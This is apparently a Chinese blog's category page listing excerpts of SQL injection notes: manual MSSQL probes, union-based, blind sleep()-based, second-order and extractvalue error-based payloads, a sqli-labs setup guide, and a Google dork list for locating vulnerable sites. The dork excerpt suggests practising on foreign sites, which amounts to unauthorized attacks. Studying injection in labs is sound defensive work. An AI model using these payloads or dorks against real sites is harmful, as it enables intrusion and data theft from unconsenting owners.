渗透:SQL注入
柴月和岐月
兴趣使然的程序猿
展开
-
常用手工注入语句
以下内容的来源忘了,仅做转载当作笔记,侵删Sql常用手工注入语句and exists(select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本and 1=(select d...转载 2018-09-17 15:35:50 · 1203 阅读 · 0 评论 -
SQL注入笔记01:基于union的注入
(笔记内容来自小迪8,用以方便查看)以下内容都以(url)?id=3为例,比如www.xx.com?id=3******************************************************************思路:获取表列数目用以后续查询 -》获取当前查询属于哪个数据库和数据库版本等系统信息 -》查询有哪些数据...原创 2018-09-14 15:40:44 · 1200 阅读 · 0 评论 -
SQL注入笔记02:基于不同参数类型的注入
数字型$id=$_GET['x']Select * from news where id=$id如:?x=1->Select * from news where id=1注入更改:无字符型$id=$_GET['x']Select * from news where id='$id'如:?x=admin->Select * from news where id='...原创 2018-09-14 15:42:20 · 236 阅读 · 0 评论 -
SQL注入笔记03:盲注攻击
普通联合注入和盲注的区别普通注入:效率高,兼容性差盲注:效率低,兼容性强工具采用的基本都为盲注及其他注入********************************************************基于时间延迟的盲注攻击:********************************************************sleep() ...原创 2018-09-14 15:43:47 · 683 阅读 · 0 评论 -
SQL注入笔记04:二次注入
UPDATA users SET password='$new_passwd' where name='$name' and password='$old_passwd';如果name为XXX'#这种形式,比如test'#,admin'#等等UPDATA users SET password='123456' where name='test'#' and password='asda...原创 2018-09-14 15:44:55 · 373 阅读 · 0 评论 -
搭建sqli-labs环境来练习SQL注入
sqli-labs是什么以下信息粗浅翻译自:sqli-labsSQLI-LABS是一个学习SQL注入的平台: 基于错误的注入 (Union Select) String 字符型 Intiger 数字型 基于错误的注入 (基于双注入) 盲注: 1.基于布尔型的 2.基于时间的 更新查询注入. 插入查询注入. 头注入. 1.基于R...原创 2018-09-27 11:33:30 · 1804 阅读 · 1 评论 -
SQL注入笔记05:利用和绕过
1、利用当前页面排版: 如id=1有数据而id=0无数据,则可构造信息?id=0 union select 1,2,3,user(),version()#2、利用报错信息: 1.extractvalue() select * from test where id=1 and (extractvalue(1,concat(0x7e,(select use...原创 2018-10-12 10:00:35 · 289 阅读 · 0 评论 -
转:Google SQL 注入搜索列表:2018最新版
这是一个Google注入查询列表(傻瓜式),更新于2018年;根据一些关键字和URL结构,可批量查询出存在安全隐患的站点。 可以用来搜索境外的站点来进行SQL注入练习和学习使用,切勿未授权对国内站点进行渗透测试。 SQL注入是一种攻击者利用未经验证的输入漏洞并通过在后端数据库中执行的Web应用程序注入SQL命令的技术。 谷歌搜索语法怎么用,想必大家应该都会了...转载 2018-11-12 14:22:36 · 17097 阅读 · 1 评论